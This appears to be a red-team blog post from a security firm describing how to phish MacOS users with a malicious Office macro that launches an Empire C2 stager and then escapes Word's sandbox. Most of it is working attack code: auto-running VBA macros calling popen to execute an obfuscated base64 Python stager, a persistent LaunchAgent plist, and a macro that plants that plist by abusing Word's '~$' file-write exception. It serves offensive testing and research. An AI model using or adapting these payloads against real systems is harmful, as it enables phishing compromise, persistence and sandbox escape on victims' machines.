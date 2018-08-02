You’ve completed your recon, and found that your target is using MacOS… what next? With the increased popularity of MacOS in the enterprise, we are often finding that having phishing payloads targeting only Microsoft Windows endpoints is not enough during a typical engagement.
With this in mind, I wanted to find an effective method of landing a stager on a MacOS system during a phishing campaign. In this walkthrough, I will show one possible way we can go about gaining a foothold by leveraging Microsoft Office on MacOS, and present a method of escaping the MacOS sandbox that we find ourselves trapped inside of.
Empire is a powerful open source C2 framework originally purposed against Windows environments by leveraging PowerShell. Now with the merge of the separate Empyre project, Empire is quickly becoming a goto tool for handling MacOS endpoints as well. Exploring the current MacOS stagers on offer from the framework, we see the typical selection of binary payloads, AppleScript, and Office Macros which you would come to expect from this kind of project.
As we know, adversaries regularly use Macro payloads to target Microsoft Office users on Windows. We know it works, so it makes sense for us to use this same technique to target MacOS users during an engagement. Before I started playing around with the MacOS Macro stager, I wanted to see just how this functions under the hood. As the project is open source, we can review the history of the stager on Github. What caught my attention was this update to the stager from @import-au on 1st March 2018:
This small modification actually changes the way that the VBA payload is generated to incorporate changes made to the language in later versions of Office. Put simply, the Macro references an external library of libc.dylib, allowing us to execute system commands via the “popen” function. If we generate a stager using Empire, we end up with something that looks like this:
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
Sub Auto_Open()
'MsgBox("Auto_Open()")
Debugging
End Sub
Sub Document_Open()
'MsgBox("Document_Open()")
Debugging
End Sub
Public Function Debugging() As Variant
On Error Resume Next
#If Mac Then
Dim result As LongPtr
Dim cmd As String
cmd = "aW1wb3J0IHN5cztpbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS"
cmd = cmd + "4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy"
cmd = cmd + "4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dH"
cmd = cmd + "A6Ly8xMjcuMC4wLjE6ODA4MCc7dD0nL25ld3MucGhwJztyZX"
cmd = cmd + "E9dXJsbGliMi5SZXF1ZXN0KHNlcnZlcit0KTsKcmVxLmFkZF"
cmd = cmd + "9oZWFkZXIoJ1VzZXItQWdlbnQnLFVBKTsKcmVxLmFkZF9oZW"
cmd = cmd + "FkZXIoJ0Nvb2tpZScsInNlc3Npb249L0Y0V3BmZllPSnNXOG"
cmd = cmd + "JuVGRWYVc5b3d1NGxFPSIpOwpwcm94eSA9IHVybGxpYjIuUH"
cmd = cmd + "JveHlIYW5kbGVyKCk7Cm8gPSB1cmxsaWIyLmJ1aWxkX29wZW"
cmd = cmd + "5lcihwcm94eSk7CnVybGxpYjIuaW5zdGFsbF9vcGVuZXIoby"
cmd = cmd + "k7CmE9dXJsbGliMi51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj"
cmd = cmd + "1hWzA6NF07ZGF0YT1hWzQ6XTtrZXk9SVYrJ0F0eihdKUVhbk"
cmd = cmd + "9UajE5b2Jfa20zTWg+KzZ2TkxRfXMlJztTLGosb3V0PXJhbm"
cmd = cmd + "dlKDI1NiksMCxbXQpmb3IgaSBpbiByYW5nZSgyNTYpOgogIC"
cmd = cmd + "Agaj0oaitTW2ldK29yZChrZXlbaSVsZW4oa2V5KV0pKSUyNT"
cmd = cmd + "YKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KaT1qPTAKZm9yIG"
cmd = cmd + "NoYXIgaW4gZGF0YToKICAgIGk9KGkrMSklMjU2CiAgICBqPS"
cmd = cmd + "hqK1NbaV0pJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQ"
cmd = cmd + "ogICAgb3V0LmFwcGVuZChjaHIob3JkKGNoYXIpXlNbKFNbaV"
cmd = cmd + "0rU1tqXSklMjU2XSkpCmV4ZWMoJycuam9pbihvdXQpKQ=="
'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\"" " & cmd & " \""));"" | /usr/bin/python &")
result = system("echo ""import sys,base64;exec(base64.b64decode(\"" " & cmd & " \""));"" | /usr/bin/python &", "r")
#End If
End Function
Private Declare PtrSafe Function system Lib "libnope.dylib" Alias "doesntexist" (ByVal command As String, ByVal mode As String) As LongPtr
Simple enough… however after interacting with the agent, you may notice that things aren’t quite right:
So whilst we can operate in this environment, it becomes extremely restrictive. With this in mind and a can of Redbull (other energy drinks also available), I decided to take a look at what was happening and see if we can do anything to bypass these restrictions.
For anyone who has spent a bit of time working on MacOS, you will know that the error shown above is typical of an application restricted by the MacOS sandbox. If we list our processes, we see that our suspicion about Microsoft Word is confirmed:
Knowing this, we can take a look at the sandbox rules applied to the Microsoft Word application with the following command:
codesign --display -v --entitlements - /Applications/Microsoft\ Word.app
Displayed are a number of requested entitlements, which allow Microsoft Word to access user selected files, act as a network client, access the address book etc:
...
com.apple.security.files.bookmarks.app-scope
com.apple.security.files.user-selected.read-write
com.apple.security.network.client
com.apple.security.personal-information.addressbook
com.apple.security.print
...
Then, as we get closer to the end of the list, we see something a little bit strange:
com.apple.security.temporary-exception.sbpl
(allow file-read* file-write*
(require-any
(require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~\$[^/]+$"))
)
)
This rule allows the Microsoft Word process to read/write a file as long as it matches the following regex
(^|/)~\$[^/]+$
Now we have a chink in the sandbox armour, we need to find a way to use this to help escape this sandbox and gain an unrestricted agent session.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.xpnsec.escape</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODA4MCc7dD0nL2xvZ2luL3Byb2Nlc3MucGhwJztyZXE9dXJsbGliMi5SZXF1ZXN0KHNlcnZlcit0KTsKcmVxLmFkZF9oZWFkZXIoJ1VzZXItQWdlbnQnLFVBKTsKcmVxLmFkZF9oZWFkZXIoJ0Nvb2tpZScsInNlc3Npb249cWV1eW94SURrM1hzeTNGcW9adGlYV0h5U0FZPSIpOwpwcm94eSA9IHVybGxpYjIuUHJveHlIYW5kbGVyKCk7Cm8gPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihwcm94eSk7CnVybGxpYjIuaW5zdGFsbF9vcGVuZXIobyk7CmE9dXJsbGliMi51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT1hWzQ6XTtrZXk9SVYrJ0F0eihdKUVhbk9UajE5b2Jfa20zTWg+KzZ2TkxRfXMlJztTLGosb3V0PXJhbmdlKDI1NiksMCxbXQpmb3IgaSBpbiByYW5nZSgyNTYpOgogICAgaj0oaitTW2ldK29yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KaT1qPTAKZm9yIGNoYXIgaW4gZGF0YToKICAgIGk9KGkrMSklMjU2CiAgICBqPShqK1NbaV0pJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQogICAgb3V0LmFwcGVuZChjaHIob3JkKGNoYXIpXlNbKFNbaV0rU1tqXSklMjU2XSkpCmV4ZWMoJycuam9pbihvdXQpKQ=='));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
launchctl bootout gui/$UID
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
Private Sub Document_Open()
Dim path As String
Dim payload As String
payload = "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgdXJsbGliMj" & _
"sKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdl" & _
"Y2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODA4MCc7dD0nL2xvZ2luL3Byb2Nlc3MucGhwJztyZXE9dXJsbGliMi5SZ" & _
"XF1ZXN0KHNlcnZlcit0KTsKcmVxLmFkZF9oZWFkZXIoJ1VzZXItQWdlbnQnLFVBKTsKcmVxLmFkZF9oZWFkZXIoJ0Nvb" & _
"2tpZScsInNlc3Npb249cWV1eW94SURrM1hzeTNGcW9adGlYV0h5U0FZPSIpOwpwcm94eSA9IHVybGxpYjIuUHJveHlIYW5k" & _
"bGVyKCk7Cm8gPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihwcm94eSk7CnVybGxpYjIuaW5zdGFsbF9vcGVuZXIobyk7CmE9dX" & _
"JsbGliMi51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT1hWzQ6XTtrZXk9SVYrJ0F0eihdKUVhbk9UajE5b2" & _
"Jfa20zTWg+KzZ2TkxRfXMlJztTLGosb3V0PXJhbmdlKDI1NiksMCxbXQpmb3IgaSBpbiByYW5nZSgyNTYpOgogICAgaj0oaitT" & _
"W2ldK29yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KaT1qPTAKZm9yIGNoYXIg" & _
"aW4gZGF0YToKICAgIGk9KGkrMSklMjU2CiAgICBqPShqK1NbaV0pJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQogICA" & _
"gb3V0LmFwcGVuZChjaHIob3JkKGNoYXIpXlNbKFNbaV0rU1tqXSklMjU2XSkpCmV4ZWMoJycuam9pbihvdXQpKQ=='));"
path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.xpnsec.plist"
arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _
"<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">\n" & _
"<plist version=""1.0"">\n" & _
"<dict>\n" & _
"<key>Label</key>\n" & _
"<string>com.xpnsec.sandbox</string>\n" & _
"<key>ProgramArguments</key>\n" & _
"<array>\n" & _
"<string>python</string>\n" & _
"<string>-c</string>\n" & _
"<string>" & payload & "</string>" & _
"</array>\n" & _
"<key>RunAtLoad</key>\n" & _
"<true/>\n" & _
"</dict>\n" & _
"</plist>"
Result = system("echo """ & arg & """ > '" & path & "'", "r”)
‘Make sure this doesn’t raise alarms as it will force the user to logoff
'Result = system("launchctl bootout gui/$UID”, “r")
End Sub
Speak to one of our industry experts and find out how MDSec can help your business.
+44 (0) 1625 263 503
contact@mdsec.co.uk